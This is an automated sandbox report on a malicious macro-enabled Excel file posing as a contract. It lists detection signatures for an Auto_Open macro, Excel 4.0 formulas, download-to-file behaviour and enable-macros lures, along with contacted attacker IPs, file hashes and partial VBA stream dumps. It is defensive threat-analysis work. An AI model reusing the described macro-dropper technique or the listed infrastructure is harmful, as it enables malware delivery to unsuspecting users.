Analysis Report Contract_132508562.xlsm
Overview
General Information
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: | OLE, VBA macro: | Name: Auto_Open |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro: | Name: Auto_Open |
Source: | OLE indicator, VBA macros: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting32 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting32 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
7% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
83.136.232.110 | unknown | Russian Federation | 31326 | MTR-SVIAZ-ASRU | false | |
190.14.37.247 | unknown | Panama | 52469 | OffshoreRacksSAPA | false | |
185.212.131.194 | unknown | Germany | 200313 | INTERNET-ITNL | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 382682 |
Start date: | 06.04.2021 |
Start time: | 13:55:14 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Contract_132508562.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal80.expl.evad.winXLSM@7/7@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
83.136.232.110 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
190.14.37.247 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
185.212.131.194 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
OffshoreRacksSAPA | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
INTERNET-ITNL | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
MTR-SVIAZ-ASRU | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 158055 |
Entropy (8bit): | 7.981278766139217 |
Encrypted: | false |
SSDEEP: | 3072:4XE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGq:AE5SDvbXAyHbVt15wTQDl |
MD5: | CB67CED3017DF7803FBA5D86FCEB4276 |
SHA1: | C7B8B4A44BDF7F7775F61FCF236A0834CB321733 |
SHA-256: | C31F711B323EA0B1D04C7A72ECAC0BBBF4DC4ECC56F837FEFE754F53385D07B1 |
SHA-512: | 1E70FD6101A50A0AEDFF22C2DB22A5FB4E063C02E6C062097A973FED663E6623BDA2FFA33B266001AB99BA5AA945FA51C1571C553015C8F8633D68BFA7F663D1 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 181138 |
Entropy (8bit): | 7.9639442905130755 |
Encrypted: | false |
SSDEEP: | 3072:3quXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGc:3PE5SDvbXAyHbVt15wTQDl |
MD5: | 5CA9617551CBF84AA362A116CF5D79CC |
SHA1: | 57B4FC8A852D5AEA8FC5C2FF17299C1983C48E89 |
SHA-256: | 4DD716427F8687E95A353F6AD5D9B6948BD7F02F09544968B2B39096A7764A9E |
SHA-512: | 521EA88C22279AA46F477A6F1721A1CA32D5120CA5D4D65E8FBCAB210F609C335EFB48AE92FD154961BF2A5CC89E7B055B1314DFE294CB873D4164EE331BA6BC |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2118 |
Entropy (8bit): | 4.5646868227619475 |
Encrypted: | false |
SSDEEP: | 48:8D/XT0jFqZk/MchyVQh2D/XT0jFqZk/MchyVQ/:8D/XojFqZkUchyVQh2D/XojFqZkUchyK |
MD5: | E6CBDAAD44D57AABE8215DCFA0E087B7 |
SHA1: | D3F373DCFB9AE9A3FF24AF21135F79DC663A4454 |
SHA-256: | DE61F7139904A668341F31C31C897CB5EA393BC715C22AB576EFD226789F8F4A |
SHA-512: | E6457C634AF0443B9DCF9B947C79D8B60CD80725DA743C9024825E87377B70FB149FF940B92239C772120C5778058E2F6DFC4BD5776CF24AA13E92B1CC658F18 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.484186514420863 |
Encrypted: | false |
SSDEEP: | 12:85QA8FdsNcLgXg/XAlCPCHaXtB8XzB/ubX+WnicvbrubDtZ3YilMMEpxRljKnXcs:8538LsNK/XTd6j8YeviDv3qVrNru/ |
MD5: | D999508FB80FA8E3FD8025ABFD486321 |
SHA1: | FC8D5AA194E5CBC25945F27DED860D12F911071B |
SHA-256: | 5F7EBA57C6E925E80F4D7F97D5574ECDD182DD16920B7653A3E392EF6CA5E7CD |
SHA-512: | 4E43D3B1B7FA2FAB092DAAD5BE182A28E1D47ED26002D63689250FB3EE2A3ECB28A5ADE6EDD4C06E205FB6D9F086F94E5F9B91DC40BB4780F542C99A11FC8E43 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 109 |
Entropy (8bit): | 4.781940430995407 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWt7Gc1TXLUl+EUGc1TXLUlmxWt7Gc1TXLUlv:djeCQTXLUdQTXLUzCQTXLU1 |
MD5: | 2747EA491ECD274541188B946DBEAD52 |
SHA1: | 2A2A3512122B2BD922198D13BAF6553133070B9B |
SHA-256: | 1AE9A2620049FE85A0455585E86DF191D62B6BA603C97E3E98949575178C02EC |
SHA-512: | F6332A74651850286C30BD107B45D1FE1F6D9A49065EFF2E5212743C26E193924856C9F7A5702C37FBFC824CF6765488082D7A274E53F709620938CE463E1595 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 181141 |
Entropy (8bit): | 7.964105214036775 |
Encrypted: | false |
SSDEEP: | 3072:3sjuXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGu:3siE5SDvbXAyHbVt15wTQD/ |
MD5: | 69F4D55939A258FA632B416A61ACC9E0 |
SHA1: | 398C74B760A3F54C27EDE8D5A2BAD37B21615E1C |
SHA-256: | 884714D2130653FD4D0D2261F165202F04BFECA2D9FC6F223B6EF79A69D52BCF |
SHA-512: | 8E61FC804C7907EAE86390A4E61F4D3FBFE31B1569DE1E89E7BE28704AB276D5353BD8B4A59FBCD9EE0E0383C2633484A5B04F51E6DDD2EE6E9992493F23651A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.963229655761012 |
TrID: |
|
File name: | Contract_132508562.xlsm |
File size: | 178369 |
MD5: | 4acf095722b577ef282e9b2b736de65d |
SHA1: | fbb4e8aee2d48443cd9ee930fc79891edc88edaa |
SHA256: | 8815a2be7dfd8565affb9271d229aab6289a97a96de5428c966fad85c6141e68 |
SHA512: | 72cc25cf42e1dd36a27164643ca978a16422c9e7cd03a16a78ad36cc4279959a68102c78cc76b5148f378e0413637187e86a886ed4cd9cd250403a39c19c40b8 |
SSDEEP: | 3072:qHYXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGUmh:qHgE5SDvbXAyHbVt15wTQDjmh |
File Content Preview: | PK..........!..D.C............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "/opt/package/joesandbox/database/analysis/382682/sample/Contract_132508562.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05T18:19:34Z |
Last Saved Time: | 2021-04-05T10:24:08Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams with VBA |
---|
VBA File Name: Module1.bas, Stream Size: 1415 |
---|
General | |
---|---|
Stream Path: | VBA/Module1 |
VBA File Name: | Module1.bas |
Stream Size: | 1415 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 02 f0 00 00 00 f2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 20 03 00 00 ec 04 00 00 00 00 00 00 01 00 00 00 d2 b3 f0 e3 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Application.ScreenUpdating |
Application.Run |
Attribute |
Auto_Open() |
VB_Name |
Private |
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 587 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ISO-8859 text, with CRLF line terminators |
Stream Size: | 587 |
Entropy: | 5.30322377136 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . D o c u m e n t = . . . . 2 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 B 6 9 C 7 7 2 2 A 7 6 2 A 7 6 2 E 7 A 2 E |
Data Raw: | 49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d dd f2 e0 ca ed e8 e3 e0 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb |
Stream Path: PROJECTwm, File Type: data, Stream Size: 89 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 89 |
Entropy: | 3.99189663324 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . . . . 2 . . . 8 . A . B . 2 . . . . . |
Data Raw: | dd f2 e0 ca ed e8 e3 e0 00 2d 04 42 04 30 04 1a 04 3d 04 38 04 33 04 30 04 00 00 cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 cb e8 f1 f2 32 00 1b 04 38 04 41 04 42 04 32 00 00 00 00 00 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3165 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3165 |
Entropy: | 4.47387908896 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/dir, File Type: data, Stream Size: 575 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 575 |
Entropy: | 6.43198224607 |
Base64 Encoded: | True |
Data ASCII: | . ; . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . l . ^ b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 3b b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 6c a6 5e 62 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 1014 |
---|
General | |
---|---|
Stream Path: | VBA/\x1051\x1080\x1089\x10901 |
File Type: | data |
Stream Size: | 1014 |
Entropy: | 3.25066068683 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . . . . . . . . . . . . n } . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 01 f0 00 00 00 ea 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff f1 02 00 00 45 03 00 00 00 00 00 00 01 00 00 00 d2 b3 6e 7d 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: VBA/\x1051\x1080\x1089\x10902, File Type: data, Stream Size: 1278 |
---|
General | |
---|---|
Stream Path: | VBA/\x1051\x1080\x1089\x10902 |
File Type: | data |
Stream Size: | 1278 |
Entropy: | 3.41554657424 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . b 7 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . ? . . J . . $ . . . ; . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . f < . @ . . h | . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 01 00 01 00 00 e2 03 00 00 e4 00 00 00 10 02 00 00 10 04 00 00 e9 03 00 00 4d 04 00 00 00 00 00 00 01 00 00 00 d2 b3 62 37 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 c8 5a f9 c4 3f e9 97 4a 88 a0 24 7f be c3 3b 18 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 1425 |
---|
General | |
---|---|
Stream Path: | VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072 |
File Type: | data |
Stream Size: | 1425 |
Entropy: | 3.30339911501 |
Base64 Encoded: | True |
